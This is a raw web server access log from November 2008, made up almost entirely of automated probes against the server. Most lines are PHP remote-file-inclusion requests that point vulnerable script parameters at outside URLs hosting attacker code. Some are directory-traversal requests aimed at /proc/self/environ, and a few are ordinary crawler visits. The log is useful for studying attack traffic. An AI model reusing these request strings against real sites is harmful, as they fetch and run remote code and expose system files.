124.38.187.59 - - [15/Nov/2008:20:53:09 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
140.130.101.5 - - [15/Nov/2008:20:53:54 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
219.94.128.213 - - [15/Nov/2008:20:56:51 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
219.94.128.213 - - [15/Nov/2008:20:56:51 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.38.31.50 - - [15/Nov/2008:20:57:02 -0600] "GET /?sourcedir=http://muconha.servegame.com:8090//appserv/shmbusgaid.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Nov/2008:20:57:02 -0600] "GET /logs/?sourcedir=http://muconha.servegame.com:8090//appserv/shmbusgaid.txt%0D?? HTTP/1.1" 200 107159 "-""libwww-perl/5.805"
219.94.155.28 - - [15/Nov/2008:20:58:11 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.94.155.28 - - [15/Nov/2008:20:58:11 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.94.148.24 - - [15/Nov/2008:20:59:19 -0600] "GET /logs//ch_readalso.php?read_xml_include=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.94.148.24 - - [15/Nov/2008:20:59:20 -0600] "GET //ch_readalso.php?read_xml_include=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
140.130.101.5 - - [15/Nov/2008:21:01:01 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
219.94.162.56 - - [15/Nov/2008:21:02:12 -0600] "GET /logs/access_log.1214179200//components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:02:13 -0600] "GET //components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:02:13 -0600] "GET /logs//components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.65.1.253 - - [15/Nov/2008:21:02:18 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.dcfcsite.org/on.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
216.65.1.253 - - [15/Nov/2008:21:02:18 -0600] "GET //appserv/main.php?appserv_root=http://www.dcfcsite.org/on.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
219.94.155.28 - - [15/Nov/2008:21:02:56 -0600] "GET //errors.php?error=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.94.155.28 - - [15/Nov/2008:21:02:56 -0600] "GET /logs//errors.php?error=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
216.65.1.253 - - [15/Nov/2008:21:04:01 -0600] "GET /logs/access_log.1214956800//appserv/main.php?appserv_root=http://www.dcfcsite.org/on.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
216.65.1.253 - - [15/Nov/2008:21:04:01 -0600] "GET //appserv/main.php?appserv_root=http://www.dcfcsite.org/on.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
216.65.1.253 - - [15/Nov/2008:21:04:02 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.dcfcsite.org/on.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
216.65.1.253 - - [15/Nov/2008:21:06:06 -0600] "GET //appserv/main.php?appserv_root=http://www.dcfcsite.org/on.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
218.219.147.58 - - [15/Nov/2008:21:06:28 -0600] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.219.147.58 - - [15/Nov/2008:21:06:28 -0600] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.94.148.24 - - [15/Nov/2008:21:07:52 -0600] "GET ///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 1244 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.94.148.24 - - [15/Nov/2008:21:07:53 -0600] "GET /logs///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 107165 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
84.234.72.255 - - [15/Nov/2008:21:08:00 -0600] "GET /logs//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
84.234.72.255 - - [15/Nov/2008:21:08:00 -0600] "GET /logs/access_log.1223251200//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.234.72.255 - - [15/Nov/2008:21:08:04 -0600] "GET /logs//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
84.234.72.255 - - [15/Nov/2008:21:08:04 -0600] "GET /logs/access_log.1223251200//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
206.74.10.235 - - [15/Nov/2008:21:08:07 -0600] "GET /robots.txt HTTP/1.0" 404 282 "http://majestic12.co.uk/bot.php?I=5F45EC7639F6FB741A1499D44154BD40-D6B58BA9039A7653-56EDC80E5B8994A3-tomdolan.pconline.com""Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)"
206.74.10.235 - - [15/Nov/2008:21:08:19 -0600] "GET /logs/access_log.1218585600 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)"
219.94.162.56 - - [15/Nov/2008:21:08:28 -0600] "GET /logs/access_log.1214956800//include/write.php?dir=? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:08:28 -0600] "GET //include/write.php?dir=? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:08:29 -0600] "GET /logs//include/write.php?dir=? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:08:43 -0600] "GET /logs/access_log.1216425600//include/write.php?dir=? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
124.0.208.252 - - [15/Nov/2008:21:10:00 -0600] "GET /logs/access_log.1218585600//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.0.208.252 - - [15/Nov/2008:21:10:01 -0600] "GET /logs//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.0.208.252 - - [15/Nov/2008:21:10:01 -0600] "GET /logs/access_log.1223251200//smf/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
82.194.85.198 - - [15/Nov/2008:21:10:05 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
80.241.163.249 - - [15/Nov/2008:21:10:48 -0600] "GET /logs//smf/?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.241.163.249 - - [15/Nov/2008:21:10:48 -0600] "GET //smf/?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 289 "-""libwww-perl/5.805"
80.241.163.249 - - [15/Nov/2008:21:10:49 -0600] "GET /logs//smf/?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.241.163.249 - - [15/Nov/2008:21:10:49 -0600] "GET //smf/?sourcedir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.219.147.58 - - [15/Nov/2008:21:10:52 -0600] "GET /logs//ch_readalso.php?read_xml_include=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.219.147.58 - - [15/Nov/2008:21:10:57 -0600] "GET //ch_readalso.php?read_xml_include=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
213.248.62.97 - - [15/Nov/2008:21:11:12 -0600] "GET //errors.php?error=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.248.62.97 - - [15/Nov/2008:21:11:12 -0600] "GET /logs//errors.php?error=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
220.100.228.195 - - [15/Nov/2008:21:12:13 -0600] "GET /logs//include/write.php?dir=? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
123.214.171.106 - - [15/Nov/2008:21:12:17 -0600] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
123.214.171.106 - - [15/Nov/2008:21:12:17 -0600] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
123.214.171.106 - - [15/Nov/2008:21:12:17 -0600] "GET /logs/access_log.1200009600//tools/send_reminders.php?noSet=0&includedir=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
220.100.228.195 - - [15/Nov/2008:21:12:19 -0600] "GET //include/write.php?dir=? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
123.214.171.106 - - [15/Nov/2008:21:12:31 -0600] "GET /logs/access_log.1200096000//tools/send_reminders.php?noSet=0&includedir=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
219.94.162.56 - - [15/Nov/2008:21:12:42 -0600] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:12:42 -0600] "GET //config/dbutil.bck.php?confdir=? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:12:43 -0600] "GET /logs//config/dbutil.bck.php?confdir=? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
124.0.208.252 - - [15/Nov/2008:21:12:58 -0600] "GET /logs//smf/?sourcedir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
124.0.208.252 - - [15/Nov/2008:21:13:00 -0600] "GET //smf/?sourcedir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 289 "-""libwww-perl/5.79"
219.94.162.56 - - [15/Nov/2008:21:13:19 -0600] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
219.94.155.28 - - [15/Nov/2008:21:14:18 -0600] "GET ///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 1244 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.94.155.28 - - [15/Nov/2008:21:14:20 -0600] "GET /logs///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 107165 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.109.250.156 - - [15/Nov/2008:21:16:00 -0600] "GET /logs/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:16:00 -0600] "GET /errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:16:00 -0600] "GET /logs/access_log.1216512000/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:21:16:06 -0600] "GET /logs/access_log.1216684800/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.6.23.43 - - [15/Nov/2008:21:18:27 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [15/Nov/2008:21:18:30 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
219.94.128.213 - - [15/Nov/2008:21:19:36 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 313 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
219.94.128.213 - - [15/Nov/2008:21:19:37 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 308 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
219.94.128.213 - - [15/Nov/2008:21:21:36 -0600] "GET ///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 1244 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
219.94.128.213 - - [15/Nov/2008:21:21:38 -0600] "GET /logs///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 107165 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.219.147.58 - - [15/Nov/2008:21:21:45 -0600] "GET ///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 1244 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.94.162.56 - - [15/Nov/2008:21:21:50 -0600] "GET /logs/access_log.1207699200//modules/Forums/admin/errors.php?error=? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:21:51 -0600] "GET //modules/Forums/admin/errors.php?error=? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.219.147.58 - - [15/Nov/2008:21:21:51 -0600] "GET /logs///?custompluginfile%5B%5D=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 200 107165 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
219.94.162.56 - - [15/Nov/2008:21:21:51 -0600] "GET /logs//modules/Forums/admin/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.100.228.195 - - [15/Nov/2008:21:23:30 -0600] "GET /logs//components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:23:30 -0600] "GET //components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:24:25 -0600] "GET /logs/access_log.1214179200//components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
220.100.228.195 - - [15/Nov/2008:21:24:26 -0600] "GET //components/com_rssxt/pinger.php?mosConfig_absolute_path=? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
124.38.187.59 - - [15/Nov/2008:21:25:05 -0600] "GET //modules/Forums/admin/errors.php?error=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
124.38.187.59 - - [15/Nov/2008:21:25:07 -0600] "GET /logs//modules/Forums/admin/errors.php?error=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
219.94.162.56 - - [15/Nov/2008:21:26:13 -0600] "GET /logs/access_log.1216425600//components/com_flyspray/startdown.php?file=? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:26:14 -0600] "GET //components/com_flyspray/startdown.php?file=? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:26:14 -0600] "GET /logs//components/com_flyspray/startdown.php?file=? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
208.69.123.58 - - [15/Nov/2008:21:26:47 -0600] "GET //modules/xfsection/modify.php?dir_module=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:21:26:47 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:21:26:47 -0600] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
218.219.147.58 - - [15/Nov/2008:21:26:59 -0600] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.219.147.58 - - [15/Nov/2008:21:26:59 -0600] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
208.69.123.58 - - [15/Nov/2008:21:27:02 -0600] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
219.94.162.56 - - [15/Nov/2008:21:27:59 -0600] "GET /logs/access_log.1214956800//include/bbs.lib.inc.php?site_path=? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:28:00 -0600] "GET //include/bbs.lib.inc.php?site_path=? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:28:00 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:28:33 -0600] "GET /logs/access_log.1214956800//include/bbs.lib.inc.php?site_path=? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:28:33 -0600] "GET //include/bbs.lib.inc.php?site_path=? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
219.94.162.56 - - [15/Nov/2008:21:28:34 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
208.69.123.58 - - [15/Nov/2008:21:28:54 -0600] "GET /logs/access_log.1205366400%20//modules/xfsection/modify.php?dir_module=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
89.218.85.18 - - [15/Nov/2008:21:28:59 -0600] "GET /logs/errors.php?error=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:21:28:59 -0600] "GET /errors.php?error=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.69.123.58 - - [15/Nov/2008:21:30:10 -0600] "GET /logs//errors.php?error=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:21:30:10 -0600] "GET //errors.php?error=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
203.86.233.109 - - [15/Nov/2008:21:30:22 -0600] "GET /errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:22 -0600] "GET /logs/errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:22 -0600] "GET /logs/access_log.1216512000/errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:33 -0600] "GET /logs/errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:33 -0600] "GET /errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:33 -0600] "GET /logs/access_log.1216512000/errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:44 -0600] "GET /logs/access_log.1216684800/errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.86.233.109 - - [15/Nov/2008:21:30:46 -0600] "GET /logs/access_log.1216684800/errors.php?error=http://www.psshosting.com/tmp/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.97.203.3 - - [15/Nov/2008:21:31:07 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
209.97.203.3 - - [15/Nov/2008:21:31:07 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.69.123.58 - - [15/Nov/2008:21:31:44 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:21:31:44 -0600] "GET //components/com_flyspray/startdown.php?file=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
209.97.203.3 - - [15/Nov/2008:21:32:38 -0600] "GET /logs/access_log.1205366400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.97.203.3 - - [15/Nov/2008:21:33:15 -0600] "GET /logs/access_log.1208044800%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.232.66.15 - - [15/Nov/2008:21:38:43 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.232.66.15 - - [15/Nov/2008:21:38:43 -0600] "GET /logs//config/dbutil.bck.php?confdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 311 "-""XXXXXX"
77.232.66.15 - - [15/Nov/2008:21:38:43 -0600] "GET /logs/errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.232.66.15 - - [15/Nov/2008:21:38:44 -0600] "GET /logs//config/dbutil.bck.php?confdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""XXXXXX"
77.232.66.15 - - [15/Nov/2008:21:38:44 -0600] "GET //config/dbutil.bck.php?confdir=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.232.66.15 - - [15/Nov/2008:21:38:44 -0600] "GET /errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.232.66.15 - - [15/Nov/2008:21:38:44 -0600] "GET //config/dbutil.bck.php?confdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 306 "-""XXXXXX"
77.232.66.15 - - [15/Nov/2008:21:38:44 -0600] "GET //config/dbutil.bck.php?confdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""XXXXXX"
216.65.1.253 - - [15/Nov/2008:21:39:16 -0600] "GET /logs/errors.php?error=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.65.1.253 - - [15/Nov/2008:21:39:17 -0600] "GET /errors.php?error=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
208.83.209.15 - - [15/Nov/2008:21:39:23 -0600] "GET //ch_readalso.php?read_xml_include=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 300 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
208.83.209.15 - - [15/Nov/2008:21:39:23 -0600] "GET /logs//ch_readalso.php?read_xml_include=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 305 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
220.100.228.195 - - [15/Nov/2008:21:40:17 -0600] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
